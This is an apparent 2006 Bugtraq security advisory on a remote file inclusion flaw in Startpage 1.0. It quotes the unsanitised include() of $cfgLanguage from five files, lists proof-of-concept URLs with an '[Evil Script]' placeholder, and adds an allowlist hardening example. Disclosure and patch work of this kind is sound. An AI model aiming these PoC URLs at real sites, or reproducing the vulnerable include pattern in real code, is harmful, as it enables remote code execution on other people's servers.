Date: 10 Aug 2006 20:53:46 -0000
From: sh3ll@...ll.ir
To: bugtraq@...urityfocus.com
Subject: Startpage <= 1.0 (cfgLanguage) Remote File Inclusion Vulnerability

--------------------------------------------------------------------------------------------
Startpage 1.0 cfgLanguage Remote File Inclusion
--------------------------------------------------------------------------------------------
Author   : Sh3ll
Date     : 2006/08/10
HomePage : http://www.sh3ll.ir
Contact  : sh3ll[at]sh3ll[dot]ir
--------------------------------------------------------------------------------------------
Affected Software Description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Startpage
version     : 1.0
Vendor      : http://matthijs.draijer.org
Class       : Remote File Inclusion
Risk        : High
Summary     : 
Startpage v1.0 Is a Script Which Shows Your Favorite Links.
--------------------------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~~
The Problem Exists in edit.php , functions.php , new.php , PageBottom.php & PageTop.php ,
Which Use The Variable $cfgLanguage in an include() Function Without It Being Declared.
----------------------------------------edit.php--------------------------------------------
...
<?php
        include ("language_$cfgLanguage.php");
        ?>
...
----------------------------------------functions.php---------------------------------------
...
<?php
        include ("config.php");
        include ("language_$cfgLanguage.php");
        ?>
...
----------------------------------------new.php---------------------------------------------
...
<?php
        include ("config.php");
        include ("functions.php");
        include ("PageTop.php");
        include ("language_$cfgLanguage.php");
        connect_db();
        ?>
...
----------------------------------------PageBottom.php--------------------------------------
...
<?php
        include ("config.php");
        include ("language_$cfgLanguage.php");
        ?>
...
----------------------------------------PageTop.php-----------------------------------------
...
<?php
        include ("config.php");
        include ("language_$cfgLanguage.php");
        ?>
...
--------------------------------------------------------------------------------------------
PoC:
~~~
http://www.target.com/[Startpage]/edit.php?=[Evil Script]
http://www.target.com/[Startpage]/functions.php?cfgLanguage=[Evil Script]
http://www.target.com/[Startpage]/new.php?cfgLanguage=[Evil Script]
http://www.target.com/[Startpage]/PageBottom.php?cfgLanguage=[Evil Script]
http://www.target.com/[Startpage]/PageTop.php?cfgLanguage=[Evil Script]

Solution:
~~~~~~~~
Sanitize The Variable $cfgLanguage in edit.php , functions.php , new.php , PageBottom.php
& PageTop.php
--------------------------------------------------------------------------------------------
Note:
~~~~
Vendor Contacted, But No Response. So Do a Dirty Patch.
--------------------------------------------------------------------------------------------
Shoutz:
~~~~~~
~ Special Greetz To My Best Friend N4sh3n4s & My GF Atena
~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams 
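
Added example (not part of the original advisory or of the Startpage code): one way to apply the Solution above, by mapping $cfgLanguage onto a fixed allowlist before it reaches include(). The names ALLOWED_LANGUAGES, DEFAULT_LANGUAGE and resolve_language_file(), and the language codes 'en' and 'nl', are assumptions made for illustration.

```php
<?php
// Hardened replacement for: include ("language_$cfgLanguage.php");
// Assumed names and values: the advisory does not list the shipped languages.
const ALLOWED_LANGUAGES = ['en', 'nl'];
const DEFAULT_LANGUAGE  = 'en';

/**
 * Map a language code to a file inside $baseDir.
 * Only exact matches against the allowlist are accepted; anything else
 * (paths, URLs, arrays, null) falls back to the default language, so no
 * request-derived text ever becomes part of the include path.
 */
function resolve_language_file($code, string $baseDir): string
{
    if (!is_string($code) || !in_array($code, ALLOWED_LANGUAGES, true)) {
        $code = DEFAULT_LANGUAGE;
    }
    return $baseDir . '/language_' . $code . '.php';
}

// How each affected script would use it (shown as comments so this file
// runs on its own, without Startpage's config.php):
//
//   $cfgLanguage = DEFAULT_LANGUAGE;    // declare before anything else, so a
//                                       // request parameter cannot define it
//                                       // when register_globals is enabled
//   include (__DIR__ . "/config.php");  // may overwrite it with the site setting
//   include (resolve_language_file($cfgLanguage, __DIR__));

// Constructed sample inputs: one valid code, then values that must be rejected.
$samples = ['nl', 'xx', '../config', 'http://example.invalid/x', ['en'], null];

foreach ($samples as $sample) {
    printf(
        "%-30s -> %s\n",
        json_encode($sample),
        basename(resolve_language_file($sample, __DIR__))
    );
}
```

The explicit assignment matters most in edit.php, which in the excerpt above reaches the include() without loading config.php first.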
